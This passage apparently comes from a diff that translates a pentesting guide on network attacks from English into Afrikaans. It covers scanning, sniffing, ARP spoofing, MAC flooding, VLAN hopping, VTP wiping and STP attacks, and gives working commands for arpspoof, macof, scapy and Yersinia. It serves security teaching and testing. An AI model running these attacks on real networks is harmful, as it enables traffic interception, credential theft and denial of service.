waarin 'n **MAC Dst** verskaf word en dit dan **16 keer herhaal** word binne dieselfde pakkie.\ +Hierdie tipe pakkies word gewoonlik gestuur in 'n **ethernet 0x0842** of in 'n **UDP-pakkie na poort 9**.\ +As **geen \[MAC]** verskaf word nie, word die pakkie gestuur na **uitsaai-ethernet** (en die uitsaai-MAC sal herhaal word). ```bash # Bettercap (if no [MAC] is specificed ff:ff:ff:ff:ff:ff will be used/entire broadcast domain) wol.eth [MAC] #Send a WOL as a raw ethernet packet of type 0x0847 wol.udp [MAC] #Send a WOL as an IPv4 broadcast packet to UDP port 9 ``` +## Skandering van Gasheer -## Scanning Hosts - -Once you have discovered all the IPs (external or internal) you want to scan in depth, different actions can be performed. +Sodra jy al die IP-adresse (eksterne of interne) ontdek het wat jy in diepte wil skandeer, kan verskillende aksies uitgevoer word. ### TCP -* **Open** port: _SYN --> SYN/ACK --> RST_ -* **Closed** port: _SYN --> RST/ACK_ -* **Filtered** port: _SYN --> \[NO RESPONSE]_ -* **Filtered** port: _SYN --> ICMP message_ - +* **Oop** poort: _SYN --> SYN/ACK --> RST_ +* **Geslote** poort: _SYN --> RST/ACK_ +* **Gefiltreerde** poort: _SYN --> \[GEEN REAKSIE]_ +* **Gefiltreerde** poort: _SYN --> ICMP-boodskap_ ```bash # Nmap fast scan for the most 1000tcp ports used -nmap -sV -sC -O -T4 -n -Pn -oA fastscan +nmap -sV -sC -O -T4 -n -Pn -oA fastscan # Nmap fast scan for all the ports -nmap -sV -sC -O -T4 -n -Pn -p- -oA fullfastscan +nmap -sV -sC -O -T4 -n -Pn -p- -oA fullfastscan # Nmap fast scan for all the ports slower to avoid failures due to -T4 nmap -sV -sC -O -p- -n -Pn -oA fullscan #Bettercap Scan syn.scan 192.168.1.0/24 1 10000 #Ports 1-10000 ``` - ### UDP -There are 2 options to scan an UDP port: +Daar is 2 opsies om 'n UDP-poort te skandeer: -* Send a **UDP packet** and check for the response _**ICMP unreachable**_ if the port is **closed** (in several cases ICMP will be **filtered** so you won't receive any information inf the port is close or open). -* Send a **formatted datagrams** to elicit a response from a **service** (e.g., DNS, DHCP, TFTP, and others, as listed in _nmap-payloads_). If you receive a **response**, then, the port is **open**. - -**Nmap** will **mix both** options using "-sV" (UDP scans are very slow), but notice that UDP scans are slower than TCP scans: +* Stuur 'n **UDP-pakket** en kyk vir die respons _**ICMP onbereikbaar**_ as die poort **gesluit** is (in verskeie gevalle sal ICMP **gefilter** word, sodat jy geen inligting sal ontvang as die poort oop of toe is nie). +* Stuur 'n **geformateerde datagram** om 'n respons van 'n **diens** (bv. DNS, DHCP, TFTP, en ander, soos gelys in _nmap-payloads_) uit te lok. As jy 'n **respons** ontvang, dan is die poort **oop**. +**Nmap** sal **beide opsies meng** deur gebruik te maak van "-sV" (UDP-skanderings is baie stadig), maar let daarop dat UDP-skanderings stadiger as TCP-skanderings is: ```bash # Check if any of the most common udp services is running -udp-proto-scanner.pl +udp-proto-scanner.pl # Nmap fast check if any of the 100 most common UDP services is running nmap -sU -sV --version-intensity 0 -n -F -T4 # Nmap check if any of the 100 most common UDP services is running and launch defaults scripts -nmap -sU -sV -sC -n -F -T4 +nmap -sU -sV -sC -n -F -T4 # Nmap "fast" top 1000 UDP ports nmap -sU -sV --version-intensity 0 -n -T4 # You could use nmap to test all the UDP ports, but that will take a lot of time ``` +### SCTP Skandering -### SCTP Scan +**SCTP (Stream Control Transmission Protocol)** is ontwerp om saam met **TCP (Transmission Control Protocol)** en **UDP (User Datagram Protocol)** gebruik te word. Dit is hoofsaaklik ontwerp om die vervoer van telefonie data oor IP-netwerke te fasiliteer, deur baie van die betroubaarheidskenmerke wat in **Signaling System 7 (SS7)** gevind word, na te boots. **SCTP** is 'n kernkomponent van die **SIGTRAN**-protokolfamilie, wat daarop gemik is om SS7-seine oor IP-netwerke te vervoer. -**SCTP (Stream Control Transmission Protocol)** is designed to be used alongside **TCP (Transmission Control Protocol)** and **UDP (User Datagram Protocol)**. Its main purpose is to facilitate the transport of telephony data over IP networks, mirroring many of the reliability features found in **Signaling System 7 (SS7)**. **SCTP** is a core component of the **SIGTRAN** protocol family, which aims to transport SS7 signals over IP networks. - -The support for **SCTP** is provided by various operating systems, such as **IBM AIX**, **Oracle Solaris**, **HP-UX**, **Linux**, **Cisco IOS**, and **VxWorks**, indicating its broad acceptance and utility in the field of telecommunication and networking. - -Two different scans for SCTP are offered by nmap: _-sY_ and _-sZ_ +Ondersteuning vir **SCTP** word verskaf deur verskeie bedryfstelsels, soos **IBM AIX**, **Oracle Solaris**, **HP-UX**, **Linux**, **Cisco IOS**, en **VxWorks**, wat dui op die breë aanvaarding en bruikbaarheid daarvan in die veld van telekommunikasie en netwerke. +Nmap bied twee verskillende skanderings vir SCTP aan: _-sY_ en _-sZ_ ```bash # Nmap fast SCTP scan nmap -T4 -sY -n -oA SCTFastScan # Nmap all SCTP scan nmap -T4 -p- -sY -sV -sC -F -n -oA SCTAllScan ``` - -### IDS and IPS evasion +### IDS en IPS ontduiking {% content-ref url="ids-evasion.md" %} [ids-evasion.md](ids-evasion.md) {% endcontent-ref %} -### **More nmap options** +### **Meer nmap opsies** {% content-ref url="nmap-summary-esp.md" %} [nmap-summary-esp.md](nmap-summary-esp.md) {% endcontent-ref %} -### Revealing Internal IP Addresses - -**Misconfigured routers, firewalls, and network devices** sometimes respond to network probes using **nonpublic source addresses**. **tcpdump** can be utilized to identify packets received from private addresses during testing. Specifically, on Kali Linux, packets can be captured on the **eth2 interface**, which is accessible from the public Internet. It's important to note that if your setup is behind a NAT or a Firewall, such packets are likely to be filtered out. +### Onthulling van interne IP-adresse +**Verkeerd gekonfigureerde roetings, brandmuure en netwerktoestelle** reageer soms op netwerkondersoeke met behulp van **nie-publieke bronadresse**. **tcpdump** kan gebruik word om pakkies te identifiseer wat ontvang word vanaf private adresse tydens toetsing. Spesifiek op Kali Linux kan pakkies opgevang word op die **eth2-koppelvlak**, wat toeganklik is vanaf die openbare internet. Dit is belangrik om daarop te let dat as jou opset agter 'n NAT of 'n brandmuur is, sulke pakkies waarskynlik gefiltreer sal word. ```bash tcpdump –nt -i eth2 src net 10 or 172.16/12 or 192.168/16 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode @@ -228,30 +205,50 @@ listening on eth2, link-type EN10MB (Ethernet), capture size 65535 bytes IP 10.10.0.1 > 185.22.224.18: ICMP echo reply, id 25804, seq 1582, length 64 IP 10.10.0.2 > 185.22.224.18: ICMP echo reply, id 25804, seq 1586, length 64 ``` +## Snuffel -## Sniffing +Snuffel kan jy besonderhede van IP-reekse, subnetgroottes, MAC-adresse en hostnames leer deur vasgevangde raamwerke en pakkies te hersien. As die netwerk verkeerd geconfigureer is of die skakelstof onder druk is, kan aanvallers sensitiewe materiaal vasvang deur passiewe netwerk snuffelwerk. -Sniffing you can learn details of IP ranges, subnet sizes, MAC addresses, and hostnames by reviewing captured frames and packets. If the network is misconfigured or switching fabric under stress, attackers can capture sensitive material via passive network sniffing. - -If a switched Ethernet network is configured properly, you will only see broadcast frames and material destined for your MAC address. +As 'n geskakelde Ethernet-netwerk behoorlik gekonfigureer is, sal jy slegs uitsaai-raamwerke en materiaal sien wat bestem is vir jou MAC-adres. ### TCPDump - ```bash sudo tcpdump -i udp port 53 #Listen to DNS request to discover what is searching the host tcpdump -i icmp #Listen to icmp packets sudo bash -c "sudo nohup tcpdump -i eth0 -G 300 -w \"/tmp/dump-%m-%d-%H-%M-%S-%s.pcap\" -W 50 'tcp and (port 80 or port 443)' &" ``` - -One can, also, capture packets from a remote machine over an SSH session with Wireshark as the GUI in realtime. - +'n Persoon kan ook pakkies van 'n afgeleë masjien oor 'n SSH-sessie vasvang met Wireshark as die GUI in werkliktyd. ``` ssh user@ tcpdump -i ens160 -U -s0 -w - | sudo wireshark -k -i - ssh @ tcpdump -i -U -s0 -w - 'port not 22' | sudo wireshark -k -i - # Exclude SSH traffic ``` - ### Bettercap +Bettercap is 'n kragtige, modulêre en veelsydige hakeringshulpmiddel wat gebruik kan word vir netwerkpenetrering en -analise. Dit bied 'n verskeidenheid funksies en tegnieke wat deur hakers gebruik kan word om netwerke te verkennend, inligting te onderskep en aanvalle uit te voer. + +#### Funksies + +- **ARP Spoofing**: Hierdie funksie maak dit moontlik vir 'n aanvaller om die ARP-tabel van 'n doelwitrekenaar te vervals en sodoende alle netwerkverkeer na die aanvaller te stuur. Dit kan gebruik word om inligting te onderskep, sessies te kaap en selfs om man-in-die-middel-aanvalle uit te voer. + +- **HTTP/HTTPS Onderskepping**: Bettercap kan gebruik word om HTTP- en HTTPS-verkeer te onderskep en te manipuleer. Dit maak dit moontlik vir 'n aanvaller om inligting soos wagwoorde, kredietkaartinligting en ander gevoelige data te onderskep. + +- **DNS Spoofing**: Hierdie funksie maak dit moontlik vir 'n aanvaller om DNS-aanvrae te vervals en sodoende die doelwitrekenaar na 'n vals webwerf te stuur. Dit kan gebruik word om gebruikers te mislei en hulle gevoelige inligting te laat invoer op 'n vals webwerf. + +- **WiFi Hacking**: Bettercap kan gebruik word om WiFi-netwerke te hakeer deur middel van tegnieke soos deauth-aanvalle, wachtwoordkraking en man-in-die-middel-aanvalle. Dit kan gebruik word om toegang te verkry tot beveiligde netwerke en om inligting van gebruikers te onderskep. + +- **Plugin-ondersteuning**: Bettercap ondersteun plugins wat funksionaliteit kan toevoeg of aanpas. Dit maak dit moontlik vir hakers om die hulpmiddel aan te pas aan hul spesifieke behoeftes en om nuwe funksies by te voeg. + +#### Installering + +Om Bettercap te installeer, volg die instruksies in die [offisiële dokumentasie](https://www.bettercap.org/installation/). Dit is beskikbaar vir verskeie bedryfstelsels, insluitend Linux, macOS en Windows. + +#### Gebruik + +Na installering kan Bettercap gebruik word deur die opdragreël te hardloop met die nodige argumente en vlaggies. Raadpleeg die [offisiële dokumentasie](https://www.bettercap.org/documentation/) vir 'n volledige lys van opdragreëls en funksies. + +#### Waarskuwing + +Dit is belangrik om te onthou dat die gebruik van Bettercap sonder toestemming van die eienaar van die netwerk of stelsel onwettig is. Dit moet slegs gebruik word vir wettige doeleindes, soos netwerkpenetreringstoetse wat deur toestemming gedek word. ```bash net.sniff on net.sniff stats @@ -260,23 +257,21 @@ set net.sniff.local #If true it will consider packets from/to this computer, ot set net.sniff.filter #BPF filter for the sniffer (default=not arp) set net.sniff.regexp #If set only packets matching this regex will be considered ``` - ### Wireshark -Obviously. +Duidelik. -### Capturing credentials +### Vang van geloofsbriewe -You can use tools like [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) to parse credentials from a pcap or a live interface. +Jy kan gereedskap soos [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) gebruik om geloofsbriewe uit 'n pcap of 'n lewendige koppelvlak te ontled. -## LAN attacks +## LAN-aanvalle -### ARP spoofing +### ARP-spoofing -ARP Spoofing consist on sending gratuitous ARPResponses to indicate that the IP of a machine has the MAC of our device. Then, the victim will change the ARP table and will contact our machine every time it wants to contact the IP spoofed. +ARP-spoofing behels die stuur van valse ARP-antwoorde om aan te dui dat die IP van 'n masjien die MAC van ons toestel het. Dan sal die slagoffer die ARP-tabel verander en elke keer as dit die vervalsde IP wil kontak, sal dit ons masjien kontak. #### **Bettercap** - ```bash arp.spoof on set arp.spoof.targets #Specific targets to ARP spoof (default=) @@ -284,37 +279,39 @@ set arp.spoof.whitelist #Specific targets to skip while spoofing set arp.spoof.fullduplex true #If true, both the targets and the gateway will be attacked, otherwise only the target (default=false) set arp.spoof.internal true #If true, local connections among computers of the network will be spoofed, otherwise only connections going to and coming from the Internet (default=false) ``` - #### **Arpspoof** +Arpspoof is 'n hulpmiddel wat gebruik word in netwerkpentesting om ARP (Address Resolution Protocol) vervalsing uit te voer. Hierdie tegniek maak dit moontlik vir 'n aanvaller om die ARP-tabel van 'n doelwitrekenaar te manipuleer, sodat die aanvaller verkeer kan onderskep of omlei. + +Met behulp van arpspoof kan 'n aanvaller die ARP-pakette vervals en valse ARP-antwoorde na die doelwitstelsel stuur. Hierdie valse antwoorde kan die ARP-tabel van die doelwitstelsel manipuleer, sodat die aanvaller se MAC-adres gekoppel word aan die IP-adresse van ander stelsels in die netwerk. + +Hierdie tegniek kan gebruik word om verkeer tussen twee stelsels in 'n netwerk te onderskep of om te lei. Byvoorbeeld, as 'n aanvaller die ARP-tabel van 'n router manipuleer, kan hy al die verkeer wat deur die router gaan, onderskep en ondersoek. + +Arpspoof is 'n kragtige hulpmiddel wat deur netwerkpentesters gebruik kan word om die veiligheid van 'n netwerk te evalueer en swakpunte bloot te lê. Dit is belangrik om hierdie tegniek verantwoordelik te gebruik en slegs met toestemming van die eienaar van die netwerk. ```bash echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -t 192.168.1.1 192.168.1.2 arpspoof -t 192.168.1.2 192.168.1.1 ``` +### MAC Flooding - CAM-oorloop -### MAC Flooding - CAM overflow - -Overflow the switch’s CAM table sending a lot of packets with different source mac address. When the CAM table is full the switch start behaving like a hub (broadcasting all the traffic). - +Oorloop die skakel se CAM-tabel deur 'n groot aantal pakkies met verskillende bron-MAC-adresse te stuur. Wanneer die CAM-tabel vol is, begin die skakel optree soos 'n hub (uitstraling van alle verkeer). ```bash macof -i ``` +In moderne skakelaars is hierdie kwesbaarheid reggestel. -In modern switches this vulnerability has been fixed. +### 802.1Q VLAN / DTP-aanvalle -### 802.1Q VLAN / DTP Attacks +#### Dinamiese Trunking -#### Dynamic Trunking +Die **Dinamiese Trunking-protokol (DTP)** is ontwerp as 'n skakellaag-protokol om 'n outomatiese stelsel vir trunking te fasiliteer, wat skakelaars in staat stel om outomaties poorte vir trunk-modus (Trunk) of nie-trunk-modus te kies. Die implementering van **DTP** word dikwels beskou as 'n aanduiding van suboptimale netwerkontwerp, wat die belang van handmatige konfigurasie van trunks slegs waar nodig en die versekering van behoorlike dokumentasie beklemtoon. -The **Dynamic Trunking Protocol (DTP)** is designed as a link layer protocol to facilitate an automatic system for trunking, allowing switches to automatically select ports for trunk mode (Trunk) or non-trunk mode. The deployment of **DTP** is often seen as indicative of suboptimal network design, underscoring the importance of manually configuring trunks only where necessary and ensuring proper documentation. +Standaard is skakelaarpoorte ingestel om in Dinamiese Outo-modus te werk, wat beteken dat hulle gereed is om trunking te inisieer as dit deur 'n naburige skakelaar aangemoedig word. 'n Sekuriteitskwessie ontstaan wanneer 'n pentester of aanvaller aan die skakelaar koppel en 'n DTP-begeerlike raam stuur, wat die poort dwing om trunk-modus binne te gaan. Hierdie aksie stel die aanvaller in staat om VLAN's deur STP-raamontleding te tel en VLAN-segmentering te omseil deur virtuele interfaces op te stel. -By default, switch ports are set to operate in Dynamic Auto mode, meaning they are ready to initiate trunking if prompted by a neighboring switch. A security concern arises when a pentester or attacker connects to the switch and sends a DTP Desirable frame, compelling the port to enter trunk mode. This action enables the attacker to enumerate VLANs through STP frame analysis and circumvent VLAN segmentation by setting up virtual interfaces. - -The presence of DTP in many switches by default can be exploited by adversaries to mimic a switch's behavior, thereby gaining access to traffic across all VLANs. The script [_**dtpscan.sh**_](https://github.com/commonexploits/dtpscan) is utilized to monitor an interface, revealing whether a switch is in Default, Trunk, Dynamic, Auto, or Access mode—the latter being the only configuration immune to VLAN hopping attacks. This tool assesses the switch's vulnerability status. - -Should network vulnerability be identified, the _**Yersinia**_ tool can be employed to "enable trunking" via the DTP protocol, allowing for the observation of packets from all VLANs. +Die teenwoordigheid van DTP in baie skakelaars standaard kan deur teenstanders uitgebuit word om 'n skakelaar se gedrag na te boots, en sodoende toegang te verkry tot verkeer oor alle VLAN's. Die skrip [_**dtpscan.sh**_](https://github.com/commonexploits/dtpscan) word gebruik om 'n inteface te monitor en te onthul of 'n skakelaar in die Verstek, Trunk, Dinamiese, Outo of Toegang-modus is—laasgenoemde is die enigste konfigurasie wat immuun is vir VLAN-hopping-aanvalle. Hierdie instrument beoordeel die kwesbaarheidstatus van die skakelaar. +As netwerkkwesbaarheid geïdentifiseer word, kan die _**Yersinia**_ instrument gebruik word om "trunking" moontlik te maak via die DTP-protokol, wat die waarneming van pakkies van alle VLAN's toelaat. ```bash apt-get install yersinia #Installation sudo apt install kali-linux-large #Another way to install it in Kali @@ -325,26 +322,22 @@ yersinia -I #Interactive mode yersinia -G #For graphic mode ``` - ![](<../../.gitbook/assets/image (646) (1).png>) -To enumerate the VLANs it's also possible to generate the DTP Desirable frame with the script [**DTPHijacking.py**](https://github.com/in9uz/VLANPWN/blob/main/DTPHijacking.py)**. D**o not interrupt the script under any circumstances. It injects DTP Desirable every three seconds. **The dynamically created trunk channels on the switch only live for five minutes. After five minutes, the trunk falls off.** - +Om die VLANs op te som, is dit ook moontlik om die DTP Desirable raam met die skripsie [**DTPHijacking.py**](https://github.com/in9uz/VLANPWN/blob/main/DTPHijacking.py)** te genereer. Moenie die skripsie onder enige omstandighede onderbreek nie. Dit spuit DTP Desirable elke drie sekondes in. **Die dinamies geskepte trunk-kanale op die skakelaar bly net vir vyf minute. Na vyf minute val die trunk af.** ``` sudo python3 DTPHijacking.py --interface eth0 ``` +Ek wil graag daarop wys dat **Toegang/Begeerlik (0x03)** aandui dat die DTP-raamwerk van die Begeerlike tipe is, wat die poort vertel om na Trunk-modus oor te skakel. En **802.1Q/802.1Q (0xa5)** dui op die **802.1Q** inkapselingstipe. -I would like to point out that **Access/Desirable (0x03)** indicates that the DTP frame is of the Desirable type, which tells the port to switch to Trunk mode. And **802.1Q/802.1Q (0xa5**) indicates the **802.1Q** encapsulation type. - -By analyzing the STP frames, **we learn about the existence of VLAN 30 and VLAN 60.** +Deur die STP-raamwerke te analiseer, **kom ons agter dat VLAN 30 en VLAN 60 bestaan.**
-#### Attacking specific VLANs - -Once you known VLAN IDs and IPs values, you can **configure a virtual interface to attack a specific VLAN**.\ -If DHCP is not available, then use _ifconfig_ to set a static IP address. +#### Aanval op spesifieke VLANs +Sodra jy die VLAN-ID's en IP-waardes ken, kan jy **'n virtuele koppelvlak konfigureer om 'n spesifieke VLAN aan te val**.\ +As DHCP nie beskikbaar is nie, gebruik dan _ifconfig_ om 'n statiese IP-adres in te stel. ``` root@kali:~# modprobe 8021q root@kali:~# vconfig add eth1 250 @@ -353,13 +346,13 @@ root@kali:~# dhclient eth1.250 Reloading /etc/samba/smb.conf: smbd only. root@kali:~# ifconfig eth1.250 eth1.250 Link encap:Ethernet HWaddr 00:0e:c6:f0:29:65 - inet addr:10.121.5.86 Bcast:10.121.5.255 Mask:255.255.255.0 - inet6 addr: fe80::20e:c6ff:fef0:2965/64 Scope:Link - UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 - RX packets:19 errors:0 dropped:0 overruns:0 frame:0 - TX packets:13 errors:0 dropped:0 overruns:0 carrier:0 - collisions:0 txqueuelen:0 - RX bytes:2206 (2.1 KiB) TX bytes:1654 (1.6 KiB) +inet addr:10.121.5.86 Bcast:10.121.5.255 Mask:255.255.255.0 +inet6 addr: fe80::20e:c6ff:fef0:2965/64 Scope:Link +UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 +RX packets:19 errors:0 dropped:0 overruns:0 frame:0 +TX packets:13 errors:0 dropped:0 overruns:0 carrier:0 +collisions:0 txqueuelen:0 +RX bytes:2206 (2.1 KiB) TX bytes:1654 (1.6 KiB) root@kali:~# arp-scan -I eth1.250 10.121.5.0/24 ``` @@ -377,182 +370,209 @@ sudo vconfig add eth0 30 sudo ip link set eth0.30 up sudo dhclient -v eth0.30 ``` +#### Outomatiese VLAN Hopper -#### Automatic VLAN Hopper +Die bespreekte aanval van **Dinamiese Trunking en die skep van virtuele interfaces en die ontdekking van gasheer in ander VLAN's** word **outomaties uitgevoer** deur die instrument: [**https://github.com/nccgroup/vlan-hopping---frogger**](https://github.com/nccgroup/vlan-hopping---frogger) -The discussed attack of **Dynamic Trunking and creating virtual interfaces an discovering hosts inside** other VLANs are **automatically performed** by the tool: [**https://github.com/nccgroup/vlan-hopping---frogger**](https://github.com/nccgroup/vlan-hopping---frogger) +#### Dubbele Tagging -#### Double Tagging +As 'n aanvaller die waarde van die **MAC, IP en VLAN ID van die slagoffer gasheer** ken, kan hy probeer om 'n raamwerk **dubbel te merk met sy aangewese VLAN en die VLAN van die slagoffer** en 'n pakkie stuur. Aangesien die **slagoffer nie kan terugkoppel** met die aanvaller nie, is die **beste opsie vir die aanvaller om te kommunikeer via UDP** na protokolle wat interessante aksies kan uitvoer (soos SNMP). -If an attacker knows the value of the **MAC, IP and VLAN ID of the victim host**, he could try to **double tag a frame** with its designated VLAN and the VLAN of the victim and send a packet. As the **victim won't be able to connect back** with the attacker, so the **best option for the attacker is communicate via UDP** to protocols that can perform some interesting actions (like SNMP). - -Another option for the attacker is to launch a **TCP port scan spoofing an IP controlled by the attacker and accessible by the victim** (probably through internet). Then, the attacker could sniff in the second host owned by him if it receives some packets from the victim. +'n Ander opsie vir die aanvaller is om 'n **TCP-poortskandering te begin deur 'n IP te vervals wat deur die aanvaller beheer word en toeganklik is deur die slagoffer** (waarskynlik deur die internet). Dan kan die aanvaller snuffel in die tweede gasheer wat aan hom behoort as dit pakkies van die slagoffer ontvang. ![](<../../.gitbook/assets/image (635) (1).png>) -To perform this attack you could use scapy: `pip install scapy` - +Om hierdie aanval uit te voer, kan jy scapy gebruik: `pip install scapy` ```python from scapy.all import * # Double tagging with ICMP packet (the response from the victim isn't double tagged so it will never reach the attacker) packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='192.168.1.10')/ICMP() sendp(packet) ``` +#### Laterale VLAN-segmenteringsoorskryding -#### Lateral VLAN Segmentation Bypass - -If you have **access to a switch that you are directly connected to**, you have the ability to **bypass VLAN segmentation** within the network. Simply **switch the port to trunk mode** (otherwise known as trunk), create virtual interfaces with the IDs of the target VLANs, and configure an IP address. You can try requesting the address dynamically (DHCP) or you can configure it statically. It depends on the case. +As jy **toegang het tot 'n skakelaar waaraan jy direk gekoppel is**, het jy die vermoë om **VLAN-segmentering te omseil** binne die netwerk. Skakel eenvoudig die poort na trunk-modus (ook bekend as trunk), skep virtuele interfaces met die ID's van die teiken-VLAN's, en konfigureer 'n IP-adres. Jy kan probeer om die adres dinamies aan te vra (DHCP) of jy kan dit staties konfigureer. Dit hang af van die geval. {% content-ref url="lateral-vlan-segmentation-bypass.md" %} [lateral-vlan-segmentation-bypass.md](lateral-vlan-segmentation-bypass.md) {% endcontent-ref %} -#### Layer 3 Private VLAN Bypass +#### Laag 3 Privaat VLAN-oorskryding -In certain environments, such as guest wireless networks, **port isolation (also known as private VLAN)** settings are implemented to prevent clients connected to a wireless access point from directly communicating with each other. However, a technique has been identified that can circumvent these isolation measures. This technique exploits either the lack of network ACLs or their improper configuration, enabling IP packets to be routed through a router to reach another client on the same network. +In sekere omgewings, soos gasdraadlose netwerke, word **poort-isolasie (ook bekend as privaat VLAN)**-instellings geïmplementeer om te voorkom dat kliënte wat aan 'n draadlose toegangspunt gekoppel is, direk met mekaar kommunikeer. 'n Tegniek is egter geïdentifiseer wat hierdie isolasie-maatreëls kan omseil. Hierdie tegniek maak gebruik van die gebrek aan netwerk ACL's of hul onvanpaste konfigurasie, wat IP-pakette in staat stel om deur 'n router gerouteer te word om 'n ander kliënt op dieselfde netwerk te bereik. -The attack is executed by creating a **packet that carries the IP address of the destination client but with the router's MAC address**. This causes the router to mistakenly forward the packet to the target client. This approach is similar to that used in Double Tagging Attacks, where the ability to control a host accessible to the victim is used to exploit the security flaw. +Die aanval word uitgevoer deur 'n **pakkie te skep wat die IP-adres van die teikenkliënt dra, maar met die MAC-adres van die router**. Dit veroorsaak dat die router die pakkie per abuis na die teikenkliënt stuur. Hierdie benadering is soortgelyk aan dié wat gebruik word in Dubbele Merkingaanvalle, waar die vermoë om 'n gasheer wat toeganklik is vir die slagoffer te beheer, gebruik word om die sekuriteitsfout uit te buit. -**Key Steps of the Attack:** -1. **Crafting a Packet:** A packet is specially crafted to include the target client's IP address but with the router's MAC address. -2. **Exploiting Router Behavior:** The crafted packet is sent up to the router, which, due to the configuration, redirects the packet to the target client, bypassing the isolation provided by private VLAN settings. +**Belangrike stappe van die aanval:** +1. **Skep van 'n pakkie:** 'n Pakkie word spesiaal geskep om die IP-adres van die teikenkliënt in te sluit, maar met die MAC-adres van die router. +2. **Uitbuiting van routergedrag:** Die geskepte pakkie word na die router gestuur, wat as gevolg van die konfigurasie die pakkie na die teikenkliënt omskakel en sodoende die isolasie wat deur privaat VLAN-instellings voorsien word, omseil. -### VTP Attacks +### VTP-aanvalle -VTP (VLAN Trunking Protocol) centralizes VLAN management. It utilizes revision numbers to maintain VLAN database integrity; any modification increments this number. Switches adopt configurations with higher revision numbers, updating their own VLAN databases. +VTP (VLAN Trunking Protocol) sentraliseer VLAN-bestuur. Dit maak gebruik van revisienommers om die integriteit van die VLAN-databasis te handhaaf; enige wysiging verhoog hierdie nommer. Skakelaars neem konfigurasies met hoër revisienommers oor en werk hul eie VLAN-databasisse by. -#### VTP Domain Roles +#### VTP-domeinrolle -- **VTP Server:** Manages VLANs—creates, deletes, modifies. It broadcasts VTP announcements to domain members. -- **VTP Client:** Receives VTP announcements to synchronize its VLAN database. This role is restricted from local VLAN configuration modifications. -- **VTP Transparent:** Doesn't engage in VTP updates but forwards VTP announcements. Unaffected by VTP attacks, it maintains a constant revision number of zero. +- **VTP-bediener:** Bestuur VLAN's - skep, verwyder, wysig. Dit versprei VTP-aankondigings na domeinlede. +- **VTP-kliënt:** Ontvang VTP-aankondigings om sy VLAN-databasis te sinchroniseer. Hierdie rol is beperk vanaf plaaslike VLAN-konfigurasiewysigings. +- **VTP-deursigtig:** Neem nie deel aan VTP-opdaterings nie, maar stuur VTP-aankondigings deur. Dit word nie deur VTP-aanvalle geraak nie en handhaaf 'n konstante revisienommer van nul. -#### VTP Advertisement Types +#### VTP-advertensietipes -- **Summary Advertisement:** Broadcasted by the VTP server every 300 seconds, carrying essential domain information. -- **Subset Advertisement:** Sent following VLAN configuration changes. -- **Advertisement Request:** Issued by a VTP client to request a Summary Advertisement, typically in response to detecting a higher configuration revision number. +- **Opsommingsadvertensie:** Versprei deur die VTP-bediener elke 300 sekondes en dra noodsaaklike domeininligting. +- **Substeladvertensie:** Gestuur na VLAN-konfigurasieveranderinge. +- **Advertensieversoek:** Uitgereik deur 'n VTP-kliënt om 'n opsommingsadvertensie aan te vra, tipies as reaksie op die opsporing van 'n hoër konfigurasie-revisienommer. -VTP vulnerabilities are exploitable exclusively via trunk ports as VTP announcements circulate solely through them. Post-DTP attack scenarios might pivot towards VTP. Tools like Yersinia can facilitate VTP attacks, aiming to wipe out the VLAN database, effectively disrupting the network. - -Note: This discussion pertains to VTP version 1 (VTPv1). +VTP-gebreklikhede is uitsluitlik uitbuitbaar via trunkpoorte, aangesien VTP-aankondigings slegs daardeur versprei word. Post-DTP-aanvalscenario's kan na VTP oorskakel. Hulpmiddels soos Yersinia kan VTP-aanvalle fasiliteer deur die VLAN-databasis uit te wis en sodoende die netwerk te ontwrig. +Opmerking: Hierdie bespreking handel oor VTP-weergawe 1 (VTPv1). ```bash %% yersinia -G # Launch Yersinia in graphical mode ``` ``` - -In Yersinia's graphical mode, choose the deleting all VTP vlans option to purge the VLAN database. +In Yersinia se grafiese modus, kies die opsie om al die VTP vlans te verwyder om die VLAN-databasis te skoonmaak. -### STP Attacks +### STP Aanvalle -**If you cannot capture BPDU frames on your interfaces, it is unlikely that you will succeed in an STP attack.** +**As jy nie BPDU-rame op jou interfaces kan vasvang nie, is dit onwaarskynlik dat jy suksesvol sal wees met 'n STP-aanval.** #### **STP BPDU DoS** -Sending a lot of BPDUs TCP (Topology Change Notification) or Conf (the BPDUs that are sent when the topology is created) the switches are overloaded and stop working correctly. - +Deur 'n groot hoeveelheid BPDUs TCP (Topology Change Notification) of Conf (die BPDUs wat gestuur word wanneer die topologie geskep word) te stuur, word die skakelaars oorlê en hou op om korrek te werk. ```bash yersinia stp -attack 2 yersinia stp -attack 3 #Use -M to disable MAC spoofing ``` +#### **STP TCP Aanval** -#### **STP TCP Attack** - -When a TCP is sent, the CAM table of the switches will be deleted in 15s. Then, if you are sending continuously this kind of packets, the CAM table will be restarted continuously (or every 15segs) and when it is restarted, the switch behaves as a hub - +Wanneer 'n TCP-pakket gestuur word, sal die CAM-tabel van die skakelaars binne 15 sekondes uitgevee word. Dan, as jy voortdurend hierdie soort pakkette stuur, sal die CAM-tabel voortdurend herlaai word (elke 15 sekondes) en wanneer dit herlaai word, gedra die skakelaar hom soos 'n hub. ```bash yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds yersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen ``` +#### **STP-wortelaanval** -#### **STP Root Attack** - -The attacker simulates the behaviour of a switch to become the STP root of the network. Then, more data will pass through him. This is interesting when you are connected to two different switches.\ -This is done by sending BPDUs CONF packets saying that the **priority** value is less than the actual priority of the actual root switch. - +Die aanvaller boots die gedrag van 'n skakelaar na om die STP-wortel van die netwerk te word. Dan sal meer data deur hom gaan. Dit is interessant wanneer jy aan twee verskillende skakelaars gekoppel is.\ +Dit word gedoen deur BPDUs CONF-pakette te stuur wat sê dat die **prioriteit**-waarde minder is as die werklike prioriteit van die werklike wortelskakelaar. ```bash yersinia stp -attack 4 #Behaves like the root switch yersinia stp -attack 5 #This will make the device behaves as a switch but will not be root ``` - -**If the attacker is connected to 2 switches he can be the root of the new tree and all the traffic between those switches will pass through him** (a MITM attack will be performed). - +**As die aanvaller aan 2 skakelaars gekoppel is, kan hy die wortel van die nuwe boom wees en al die verkeer tussen daardie skakelaars sal deur hom gaan** (‘n MITM-aanval sal uitgevoer word). ```bash yersinia stp -attack 6 #This will cause a DoS as the 